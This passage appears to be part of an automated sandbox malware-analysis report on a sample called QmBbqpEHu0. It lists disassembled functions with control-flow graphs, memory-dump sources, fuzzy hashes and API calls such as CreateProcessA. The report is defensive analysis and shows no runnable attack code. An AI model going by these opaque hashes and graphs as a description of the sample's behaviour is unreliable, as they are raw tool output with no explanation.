                                                                                                                                      control_flow_graph 522 7478b28-7478b4d 524 7478b54-7478b92 call 74790d0 522->524 525 7478b4f 522->525 527 7478b98 524->527 525->524 528 7478b9f-7478bbb 527->528 529 7478bc4-7478bc5 528->529 530 7478bbd 528->530 549 7478f1b-7478f22 529->549 530->527 530->529 531 7478da3-7478db8 530->531 532 7478c40-7478c58 530->532 533 7478ded-7478df1 530->533 534 7478cad-7478ccb 530->534 535 7478c0b-7478c14 530->535 536 7478eab-7478ed0 530->536 537 7478bca-7478bce 530->537 538 7478d77-7478d8c 530->538 539 7478bf7-7478c09 530->539 540 7478d36-7478d56 530->540 541 7478c96-7478ca8 530->541 542 7478ed5-7478ee1 530->542 543 7478d91-7478d9e 530->543 544 7478cd0-7478cdc 530->544 545 7478d1f-7478d31 530->545 546 7478eff-7478f16 530->546 547 7478dbd-7478dc1 530->547 548 7478e1d-7478e29 530->548 530->549 550 7478d5b-7478d72 530->550 551 7478cfa-7478d1a 530->551 531->528 558 7478c5f-7478c75 532->558 559 7478c5a 532->559 564 7478e04-7478e0b 533->564 565 7478df3-7478e02 533->565 534->528 556 7478c27-7478c2e 535->556 557 7478c16-7478c25 535->557 536->528 554 7478be1-7478be8 537->554 555 7478bd0-7478bdf 537->555 538->528 539->528 540->528 541->528 560 7478ee3 542->560 561 7478ee8-7478efa 542->561 543->528 552 7478ce3-7478cf5 544->552 553 7478cde 544->553 545->528 546->528 562 7478dd4-7478ddb 547->562 563 7478dc3-7478dd2 547->563 566 7478e30-7478e46 548->566 567 7478e2b 548->567 550->528 551->528 552->528 553->552 570 7478bef-7478bf5 554->570 555->570 572 7478c35-7478c3b 556->572 557->572 582 7478c77 558->582 583 7478c7c-7478c91 558->583 559->558 560->561 561->528 574 7478de2-7478de8 562->574 563->574 575 7478e12-7478e18 564->575 565->575 580 7478e4d-7478e63 566->580 581 7478e48 566->581 567->566 570->528 572->528 574->528 575->528 586 7478e65 580->586 587 7478e6a-7478e80 580->587 581->580 582->583 583->528 586->587 589 7478e87-7478ea6 587->589 590 7478e82 587->590 589->528 590->589
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ry$ry$ry
                                                                                                                                      • API String ID: 0-128149707
                                                                                                                                      • Opcode ID: 33525b77cb8871bc582f279233fb2e6e61fe4e09f59a6d9847bf1cbeede15931
                                                                                                                                      • Instruction ID: a7aec6ea2332bfa0052a32dafd02329935dad35c2787951474af62eea6529cd8
                                                                                                                                      • Opcode Fuzzy Hash: 33525b77cb8871bc582f279233fb2e6e61fe4e09f59a6d9847bf1cbeede15931
                                                                                                                                      • Instruction Fuzzy Hash: 37C128B0D1420ADFCB04CFA9C5898EEFBB6FF89310B109856D515AB354D734AA82CF95
                                                                                                                                      Function 07476521 Relevance: 4.0, Strings: 3, Instructions: 267COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 593 7476521-7476540 594 7476542-747654b 593->594 595 747659d-74765e3 593->595 594->595 598 74765e5 595->598 599 74765ea-7476644 595->599 598->599 603 7476647 599->603 604 747664e-747666a 603->604 605 7476673-7476674 604->605 606 747666c 604->606 607 7476820-7476890 605->607 608 7476679-74766a1 605->608 606->603 606->607 606->608 609 74767c3-74767de 606->609 610 74766a3-74766b5 606->610 611 74767e3-74767fa 606->611 612 747670c-7476736 606->612 613 74766b7-74766d7 606->613 614 7476776-747678b 606->614 615 7476790-74767be 606->615 616 74767ff-747681b 606->616 617 74766dc-74766e0 606->617 618 747673b-7476771 606->618 634 7476892 call 7478967 607->634 635 7476892 call 7477f7b 607->635 636 7476892 call 7477caa 607->636 637 7476892 call 7478918 607->637 608->604 609->604 610->604 611->604 612->604 613->604 614->604 615->604 616->604 619 74766f3-74766fa 617->619 620 74766e2-74766f1 617->620 618->604 621 7476701-7476707 619->621 620->621 621->604 633 7476898-74768a2 634->633 635->633 636->633 637->633
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Tefq$Tefq$z^I
                                                                                                                                      • API String ID: 0-2708104242
                                                                                                                                      • Opcode ID: f329d9b3fdcbe7a405f40d932560e0623658b9d531a48e98ecf4876f7fa9a5a5
                                                                                                                                      • Instruction ID: 395bc3bce4eec3755233ebca4e75c6fcf65aa1a3f8ba3a71bd3bad1eb20b9742
                                                                                                                                      • Opcode Fuzzy Hash: f329d9b3fdcbe7a405f40d932560e0623658b9d531a48e98ecf4876f7fa9a5a5
                                                                                                                                      • Instruction Fuzzy Hash: C2A127B5E106098FCB04CFAAD8846DEFBB2FF89310F24942AD415BB254D7349946CFA5
                                                                                                                                      Function 074765C0 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 638 74765c0-74765e3 640 74765e5 638->640 641 74765ea-7476644 638->641 640->641 645 7476647 641->645 646 747664e-747666a 645->646 647 7476673-7476674 646->647 648 747666c 646->648 649 7476820-7476890 647->649 650 7476679-74766a1 647->650 648->645 648->649 648->650 651 74767c3-74767de 648->651 652 74766a3-74766b5 648->652 653 74767e3-74767fa 648->653 654 747670c-7476736 648->654 655 74766b7-74766d7 648->655 656 7476776-747678b 648->656 657 7476790-74767be 648->657 658 74767ff-747681b 648->658 659 74766dc-74766e0 648->659 660 747673b-7476771 648->660 676 7476892 call 7478967 649->676 677 7476892 call 7477f7b 649->677 678 7476892 call 7477caa 649->678 679 7476892 call 7478918 649->679 650->646 651->646 652->646 653->646 654->646 655->646 656->646 657->646 658->646 661 74766f3-74766fa 659->661 662 74766e2-74766f1 659->662 660->646 663 7476701-7476707 661->663 662->663 663->646 675 7476898-74768a2 676->675 677->675 678->675 679->675
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Tefq$Tefq$z^I
                                                                                                                                      • API String ID: 0-2708104242
                                                                                                                                      • Opcode ID: 4fdee71108ff392297b02518873d4efc0d919b6a2202ec5d51ae24ae7b364d47
                                                                                                                                      • Instruction ID: cd434437fdd85dc0fd8df821121728c3497e82798a199d8ed57867d04f1260b7
                                                                                                                                      • Opcode Fuzzy Hash: 4fdee71108ff392297b02518873d4efc0d919b6a2202ec5d51ae24ae7b364d47
                                                                                                                                      • Instruction Fuzzy Hash: E491B2B4E116198FCB08CFAAC9846DEFBB2EF89310F24942AD415BB254D7349906CF65
                                                                                                                                      Function 0747F418 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 776 747f418-747f43d 777 747f444-747f475 776->777 778 747f43f 776->778 779 747f476 777->779 778->777 780 747f47d-747f499 779->780 781 747f4a2-747f4a3 780->781 782 747f49b 780->782 783 747f70f-747f718 781->783 784 747f4a8-747f4ea 781->784 782->779 782->783 782->784 785 747f547-747f54a 782->785 786 747f504-747f52b 782->786 787 747f623-747f64a 782->787 788 747f5e3-747f5f6 782->788 789 747f6c2-747f6d4 782->789 790 747f64f-747f662 782->790 791 747f68e-747f6a6 782->791 792 747f5ac-747f5b0 782->792 793 747f4ec-747f4ff 782->793 794 747f6ab-747f6bd 782->794 795 747f615-747f61e 782->795 796 747f6f5-747f70a 782->796 797 747f594-747f5a7 782->797 798 747f530-747f542 782->798 799 747f5fb-747f610 782->799 800 747f6d9-747f6f0 782->800 801 747f578-747f58f 782->801 784->780 813 747f54d call 7476a3c 785->813 814 747f54d call 747f858 785->814 786->780 787->780 788->780 789->780 804 747f675-747f67c 790->804 805 747f664-747f673 790->805 791->780 802 747f5c3-747f5ca 792->802 803 747f5b2-747f5c1 792->803 793->780 794->780 795->780 796->780 797->780 798->780 799->780 800->780 801->780 810 747f5d1-747f5de 802->810 803->810 808 747f683-747f689 804->808 805->808 808->780 809 747f553-747f573 809->780 810->780 813->809 814->809
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TuA$UC;"
                                                                                                                                      • API String ID: 0-2071649361
                                                                                                                                      • Opcode ID: 7103c76b0348af90baa686f63036e939b585315ab7bdef57a7cdeefbb89bcc7b
                                                                                                                                      • Instruction ID: 07011ced9dc0e3d5489847f34e1e817218d0945aec7d9eb77f4884ba72f8da92
                                                                                                                                      • Opcode Fuzzy Hash: 7103c76b0348af90baa686f63036e939b585315ab7bdef57a7cdeefbb89bcc7b
                                                                                                                                      • Instruction Fuzzy Hash: AC9107B0D24609DFCF08CFA6E5819DEFBB6EF89350F10942AE415AB268D7309946CF50
                                                                                                                                      Function 0747F408 Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 815 747f408-747f43d 816 747f444-747f475 815->816 817 747f43f 815->817 818 747f476 816->818 817->816 819 747f47d-747f499 818->819 820 747f4a2-747f4a3 819->820 821 747f49b 819->821 822 747f70f-747f718 820->822 823 747f4a8-747f4ea 820->823 821->818 821->822 821->823 824 747f547-747f54a 821->824 825 747f504-747f52b 821->825 826 747f623-747f64a 821->826 827 747f5e3-747f5f6 821->827 828 747f6c2-747f6d4 821->828 829 747f64f-747f662 821->829 830 747f68e-747f6a6 821->830 831 747f5ac-747f5b0 821->831 832 747f4ec-747f4ff 821->832 833 747f6ab-747f6bd 821->833 834 747f615-747f61e 821->834 835 747f6f5-747f70a 821->835 836 747f594-747f5a7 821->836 837 747f530-747f542 821->837 838 747f5fb-747f610 821->838 839 747f6d9-747f6f0 821->839 840 747f578-747f58f 821->840 823->819 852 747f54d call 7476a3c 824->852 853 747f54d call 747f858 824->853 825->819 826->819 827->819 828->819 843 747f675-747f67c 829->843 844 747f664-747f673 829->844 830->819 841 747f5c3-747f5ca 831->841 842 747f5b2-747f5c1 831->842 832->819 833->819 834->819 835->819 836->819 837->819 838->819 839->819 840->819 849 747f5d1-747f5de 841->849 842->849 847 747f683-747f689 843->847 844->847 847->819 848 747f553-747f573 848->819 849->819 852->848 853->848
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: TuA$UC;"
                                                                                                                                      • API String ID: 0-2071649361
                                                                                                                                      • Opcode ID: 3a3ec3756b9dfe161efcdec3ff837aa3c1dab1ff959aa05d84e33abd0af143d4
                                                                                                                                      • Instruction ID: e59f1ac09658304e2320e654438f76d6c7094d9d3f3a784c4d6f2fd41dbad74d
                                                                                                                                      • Opcode Fuzzy Hash: 3a3ec3756b9dfe161efcdec3ff837aa3c1dab1ff959aa05d84e33abd0af143d4
                                                                                                                                      • Instruction Fuzzy Hash: AB9129B1D24609EFCF08CFA5E5819DEFBB6EF89350F10942AE415AB268D7309946CF50
                                                                                                                                      Function 027A6F90 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: `Yfl
                                                                                                                                      • API String ID: 0-246209650
                                                                                                                                      • Opcode ID: 173526b293685dcd8048361350dc4745b60a2b0f3cd94af7531a07e4076a781e
                                                                                                                                      • Instruction ID: 347af53f415ff42ca270add5fe59554234e224ec0a50524ce9d2048f008e0785
                                                                                                                                      • Opcode Fuzzy Hash: 173526b293685dcd8048361350dc4745b60a2b0f3cd94af7531a07e4076a781e
                                                                                                                                      • Instruction Fuzzy Hash: B791B474E01209CFCB54DFA9C994A9EBBB2FF89300F1085A9D519AB369DB309D42CF40
                                                                                                                                      Function 027A3E28 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: `Yfl
                                                                                                                                      • API String ID: 0-246209650
                                                                                                                                      • Opcode ID: 17e5822a4d30373db29289495826018ddb46cb4521f482baaf64c1bfdeb39c2a
                                                                                                                                      • Instruction ID: 27542b8b67fbd57c2493cea3931251d59c674338368625001e8154dd909a9802
                                                                                                                                      • Opcode Fuzzy Hash: 17e5822a4d30373db29289495826018ddb46cb4521f482baaf64c1bfdeb39c2a
                                                                                                                                      • Instruction Fuzzy Hash: 6791A374E01219CFCB54DFA9C994A9EBBB2FF89300F108569D519AB369DB309D41CF40
                                                                                                                                      Function 0747E3D8 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: iUfo
                                                                                                                                      • API String ID: 0-3820436262
                                                                                                                                      • Opcode ID: 425ed3b39c38a31d270f333d96ada27f447a633ca52d125a71c67526f85918e1
                                                                                                                                      • Instruction ID: 32d50140349b2d28a6ddb2a3660d6f4ee62388d76cca84508ae73843543cb09a
                                                                                                                                      • Opcode Fuzzy Hash: 425ed3b39c38a31d270f333d96ada27f447a633ca52d125a71c67526f85918e1
                                                                                                                                      • Instruction Fuzzy Hash: B07112B4E15229DFCB08CFA9D5455EEBBB2FB89300F10956AE405EB354EB349A42CB50
                                                                                                                                      Function 0747DDE2 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5=6
                                                                                                                                      • API String ID: 0-2897083178
                                                                                                                                      • Opcode ID: 64e7a25360e6f8202cbbca0896293d9c4fb99602d42e2ce96aeed47f1dae4c56
                                                                                                                                      • Instruction ID: 27c19f73ec4932b76c07790d7d6decbaee217cf94192ac81300232cdd015ef1b
                                                                                                                                      • Opcode Fuzzy Hash: 64e7a25360e6f8202cbbca0896293d9c4fb99602d42e2ce96aeed47f1dae4c56
                                                                                                                                      • Instruction Fuzzy Hash: CB714AB4E2560A9FCB48CFA5D9414EEFBB2FF89301F10992AD419E7254DB349A02CF50
                                                                                                                                      Function 0747DDF0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5=6
                                                                                                                                      • API String ID: 0-2897083178
                                                                                                                                      • Opcode ID: 46b19611c5daa232a16a0c7b8381f26d266d7a5e01409a965aeaf1544e0f4a93
                                                                                                                                      • Instruction ID: 31f579dcf5f7d36d7e2c5b98e45b38aa36ff3b122e590d2c730d4dc37dc52015
                                                                                                                                      • Opcode Fuzzy Hash: 46b19611c5daa232a16a0c7b8381f26d266d7a5e01409a965aeaf1544e0f4a93
                                                                                                                                      • Instruction Fuzzy Hash: 98614974E2561A9FCB08CFA5D9414EEFBB6FF89300F10992AD41AE7214DB349A02CF54
                                                                                                                                      Function 0747E3E8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: iUfo
                                                                                                                                      • API String ID: 0-3820436262
                                                                                                                                      • Opcode ID: b18041b053ed6c05d4998eb53dcfc27ea2a6f9e36df3e5409736c86906511cd9
                                                                                                                                      • Instruction ID: 6ba167d12563f6b4561976d37762c55e5bcd7437f8da706f2ea4d07c0296377d
                                                                                                                                      • Opcode Fuzzy Hash: b18041b053ed6c05d4998eb53dcfc27ea2a6f9e36df3e5409736c86906511cd9
                                                                                                                                      • Instruction Fuzzy Hash: E45112B4E14229DFCB14CFAAD9455EEBBB2FB89300F10856AE405BB214EB345A42CF50
                                                                                                                                      Function 0765DFC8 Relevance: .6, Instructions: 604COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: af4f198b6839ac0d76778bd4b175c5ea8cd012d112496b28a7a9e75ec7fa24d6
                                                                                                                                      • Instruction ID: 293f33f669a855319466c978fb186d58cfadc3868362987564f122c107e58879
                                                                                                                                      • Opcode Fuzzy Hash: af4f198b6839ac0d76778bd4b175c5ea8cd012d112496b28a7a9e75ec7fa24d6
                                                                                                                                      • Instruction Fuzzy Hash: 41229CB0B012059FDB19DB79C4A4BAEB7F6AF89700F144469E506DB3A0CB35EE01DB51
                                                                                                                                      Function 07477CAA Relevance: .1, Instructions: 75COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: aa03b891539b372e8a3491ae4b374e1a2e3df636d5e198ee89957dd0bfb4f071
                                                                                                                                      • Instruction ID: 63a3a0f066fa40789255293e1a8aee5a37bc2083cab64d973d271c6b55257aec
                                                                                                                                      • Opcode Fuzzy Hash: aa03b891539b372e8a3491ae4b374e1a2e3df636d5e198ee89957dd0bfb4f071
                                                                                                                                      • Instruction Fuzzy Hash: 17312AB1E006488BDB18CFABD9446DEFBB7AFC9310F14C06AD409AA264DB355945CF51
                                                                                                                                      Function 0765A775 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 940 765a775-765a815 943 765a817-765a821 940->943 944 765a84e-765a86e 940->944 943->944 945 765a823-765a825 943->945 951 765a8a7-765a8d6 944->951 952 765a870-765a87a 944->952 946 765a827-765a831 945->946 947 765a848-765a84b 945->947 949 765a835-765a844 946->949 950 765a833 946->950 947->944 949->949 953 765a846 949->953 950->949 958 765a90f-765a9c9 CreateProcessA 951->958 959 765a8d8-765a8e2 951->959 952->951 954 765a87c-765a87e 952->954 953->947 956 765a8a1-765a8a4 954->956 957 765a880-765a88a 954->957 956->951 960 765a88c 957->960 961 765a88e-765a89d 957->961 972 765a9d2-765aa58 958->972 973 765a9cb-765a9d1 958->973 959->958 962 765a8e4-765a8e6 959->962 960->961 961->961 963 765a89f 961->963 964 765a909-765a90c 962->964 965 765a8e8-765a8f2 962->965 963->956 964->958 967 765a8f4 965->967 968 765a8f6-765a905 965->968 967->968 968->968 969 765a907 968->969 969->964 983 765aa68-765aa6c 972->983 984 765aa5a-765aa5e 972->984 973->972 986 765aa7c-765aa80 983->986 987 765aa6e-765aa72 983->987 984->983 985 765aa60 984->985 985->983 989 765aa90-765aa94 986->989 990 765aa82-765aa86 986->990 987->986 988 765aa74 987->988 988->986 991 765aaa6-765aaad 989->991 992 765aa96-765aa9c 989->992 990->989 993 765aa88 990->993 994 765aac4 991->994 995 765aaaf-765aabe 991->995 992->991 993->989 997 765aac5 994->997 995->994 997->997
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0765A9B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 18e547c7493a888ab18cfe249c33dfd18fe902144ad7e29c776397e5153b516d
                                                                                                                                      • Instruction ID: 4e22d97091e2870570fc8b7b8eee341752ac51dc7b65621b4f8ee2f96257ec5d
                                                                                                                                      • Opcode Fuzzy Hash: 18e547c7493a888ab18cfe249c33dfd18fe902144ad7e29c776397e5153b516d
                                                                                                                                      • Instruction Fuzzy Hash: BA913AB1D0021ADFDB24CFA8CD41BDEBBB2BF48314F148669E849A7240DB749985DF91
                                                                                                                                      Function 0765A780 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0765A9B6
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616591996.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7650000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 8c76ea64375887c1ba3030cb9de2d5b9ad0b3398c164303ac3797efeba5d3680
                                                                                                                                      • Instruction ID: fdcbce2dfa55915eb4f400332adf998dc258d640ff588387e919c2fd5c05ebc2
                                                                                                                                      • Opcode Fuzzy Hash: 8c76ea64375887c1ba3030cb9de2d5b9ad0b3398c164303ac3797efeba5d3680
                                                                                                                                      • Instruction Fuzzy Hash: 7C913BB1D0021ADFDB24CFA8CD41BDEBBB2BF48310F148669E849A7240DB749985DF91
                                                                                                                                      Function 027AB2E0 Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5cc36d4bd70b614349a68e6a0dfeb05ad854cd4656ddc53cdeaebf3e94139ba8
                                                                                                                                      • Instruction ID: 7e7983ec1612632855a0ec2b8a0a2f7247440c99c5f479fdb9370260b15e75cb
                                                                                                                                      • Opcode Fuzzy Hash: 5cc36d4bd70b614349a68e6a0dfeb05ad854cd4656ddc53cdeaebf3e94139ba8
                                                                                                                                      • Instruction Fuzzy Hash: 488166B0A00B048FD764DF69D45475ABBF1FF98318F009A2DD08AD7A50D775E805CB91
                                                                                                                                      Function 07470006 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074700D7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DrawText
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                      • Opcode ID: 0df17002e680e7f4de2833d84f4a6f954eadfaf0b01b9dfd1d28e21a572f9d0e
                                                                                                                                      • Instruction ID: e590b708508ec52b7f1a11e50deb4a8a141f345b565833705e8ef1a502f2d291
                                                                                                                                      • Opcode Fuzzy Hash: 0df17002e680e7f4de2833d84f4a6f954eadfaf0b01b9dfd1d28e21a572f9d0e
                                                                                                                                      • Instruction Fuzzy Hash: 913146B29053899FCB11CFAAD8806DEBFF4EF49320F14846AE454E7221C375A945CBA1
                                                                                                                                      Function 027A590D Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027A59C9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_27a0000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: 0e94b4d4ce7f4da566c64e7027a452244b49f324895a31d3fd16c2bb5a40e232
                                                                                                                                      • Instruction ID: 5768fd20c1a7728235ab46eb58392b864311ef40611b194768af52013cf1e838
                                                                                                                                      • Opcode Fuzzy Hash: 0e94b4d4ce7f4da566c64e7027a452244b49f324895a31d3fd16c2bb5a40e232
                                                                                                                                      • Instruction Fuzzy Hash: 604101B0D00718CBDB24CFA9C884BCEBBF6BF88314F60816AD409AB255DB756945CF90
                                                                                                                                      Function 027A44B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027A59C9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3591106161.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
